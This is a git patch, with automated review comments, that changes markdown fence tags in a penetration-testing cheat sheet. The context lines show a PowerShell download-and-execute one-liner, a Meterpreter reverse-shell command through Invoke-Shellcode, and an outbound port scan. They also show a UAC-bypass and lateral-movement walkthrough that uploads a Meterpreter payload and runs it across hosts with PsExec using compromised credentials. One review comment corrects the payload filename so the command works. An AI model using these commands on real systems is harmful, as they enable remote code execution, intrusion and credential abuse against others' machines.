From 4b51947dd8cd25949bf4ebb805f2032d62a5d861 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 2 Dec 2013 18:45:25 -0600 Subject: [PATCH] Use syntax highlighting Removes non-existent PowerShell syntax support. Adds bash syntax for UAC writeup. --- windows/powershell.md | 8 ++++---- windows/uac.md | 10 +++++----- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/windows/powershell.md b/windows/powershell.md index f9836a1..ff4a905 100644 --- a/windows/powershell.md +++ b/windows/powershell.md @@ -5,25 +5,25 @@ One liners **Download and Execute Remote Powershell Script** -```PowerShell +``` iex (New-Object Net.WebClient).DownloadString("http://host/file.txt") ``` **Download and Save File** -```PowerShell +``` (new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe') ``` **Enumerate Allowed Outbound Ports 1-1024** -```PowerShell +``` $ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); $stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}} ``` **Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)** -```PowerShell +``` Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force ``` \ No newline at end of file diff --git a/windows/uac.md b/windows/uac.md index 25fd6ac..719027e 100644 --- a/windows/uac.md +++ b/windows/uac.md 
@@ -6,7 +6,7 @@ For this example, lets just assume that you have gotten a meterpreter shell on a For starters we can turn to PsExec. PsExec will allow us to run commands against a remote machine, and comes with a handly little option, -h. -``` +```bash -h If the target system is Vista or higher, has the process run with the account's elevated token, if available. ``` @@ -15,20 +15,20 @@ Seems handy for what were planning to do. Before we dive in though, I want to qu Continuing on, the first step that we want to do is upload a copy of PsExec.exe and an encoded copy of a malicious meterepreter exe (see the Veil project for details on how to do this) up to the server. To do this, we could do: -``` +```bash upload *path to meterpreter exe* \\users\\*target user here*\\metpr.exe upload *path to PsExec.exe* \\users\\*target user here*\\PsExec.exe ``` The next step to do is to gather a list of target IP addresses that you would like to try using your exploited user's authentication credentials against. Once you have done this, save it to a file (targets.txt in our example) and upload it to Box0. -``` +```bash upload *path to targets.txt* \\users\\*target user here*\\targets.txt ``` We then can run PsExec.exe as follows: -``` +```bash PsExec.exe @targets.txt -accepteula -c -f -h -d metr.exe ``` @@ -47,7 +47,7 @@ We do have a slight problem though. Due to something called the double hop issue We now need to find another host where our user is running with a primary token so that we can escalate privileges on Box0. To do this, we will use PsLoggedon.exe from same PsTools suite that PsExec.exe comes from. Taking the targets.txt file that we created, here is the command to pass through the credentials of our currently compromized user and find out where else he/she is logged in: -``` +```bash for /F %i in (targets.txt) do @PsLoggedon.exe \\%i 2>NUL | find "*compromized user's name goes here*" >NUL && echo %i ```
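Review bot: stripping the `PowerShell` tag from all four fences in the powershell.md hunk (@@ -5,25 +5,25 @@) leaves the blocks as untagged plain text, which is the opposite of what the commit title "Use syntax highlighting" says the patch does; if the capitalised `PowerShell` identifier is what the renderer rejects, try the lowercase `powershell` tag before dropping the tag entirely, and state in the commit message which renderer was tested. The hunk also leaves the file without a trailing newline (`\ No newline at end of file` after the Invoke-Shellcode block); add one while these lines are being touched.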
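Review bot: the block in the first uac.md hunk (@@ -6,7 +6,7 @@) is PsExec's own usage text for the `-h` option, not a shell command, so tagging the fence `bash` mislabels it and will highlight `-h` and the sentence after it as if they were shell syntax; leave that fence untagged or tag it `text`.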
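Review bot: the three blocks in the second uac.md hunk (@@ -15,20 +15,20 @@) are Meterpreter console `upload` commands and a Windows command line run on Box0, neither of which is bash, so `bash` highlighting is misleading here; `text` for the upload lines (or a Windows shell tag for the PsExec line) fits better. Separately, the unchanged context lines upload the payload as `metpr.exe` but the PsExec line runs `-d metr.exe`, so the command as written points at a file that was never uploaded; rename one side so they match, e.g. `PsExec.exe @targets.txt -accepteula -c -f -h -d metpr.exe`.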
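Review bot: the loop in the last uac.md hunk (@@ -47,7 +47,7 @@) is cmd.exe batch syntax (`for /F %i in (targets.txt) do`, `2>NUL`, `find`, `&&`), not bash, so the `bash` tag will highlight it incorrectly and may suggest to readers that it runs in a POSIX shell; use a batch/cmd tag such as `bat`, or leave the fence untagged. It is also worth a one-line note above the block that `%i` is the interactive cmd form and becomes `%%i` if the loop is pasted into a .bat file.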